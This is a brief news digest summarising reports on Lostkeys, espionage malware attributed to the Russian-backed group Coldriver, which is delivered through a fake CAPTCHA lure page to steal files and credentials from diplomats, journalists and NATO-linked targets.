Google researchers have identified a new malware called Lostkeys, used by the Russian-backed hacking group Coldriver in espionage activities targeting high-profile individuals. This malware is delivered through a fake CAPTCHA site and is designed to steal files, credentials, and system information. (Affected: High-profile individuals, NATO-related organizations, diplomats, journalists)
Keypoints :
- Lostkeys is a malware used in espionage campaigns by Coldriver, a Russian government-backed hacking group.
- The group previously relied on phishing and malware like Spica to target specific individuals and organizations.
- Targets include diplomats, military advisers, journalists, and think tanks associated with NATO countries.
- The malware is delivered via a lure website mimicking a CAPTCHA verification page, bypassing email defenses.
- Lostkeys can steal files, send system information, and exfiltrate credentials from targeted systems.
- Coldriver has been active since at least 2022, primarily targeting human rights organizations and civil society groups.
- The malware is deployed selectively, emphasizing high-value espionage objectives for Russian intelligence.
Read More: https://therecord.media/coldriver-russia-cyber-espionage-lostkeys-malware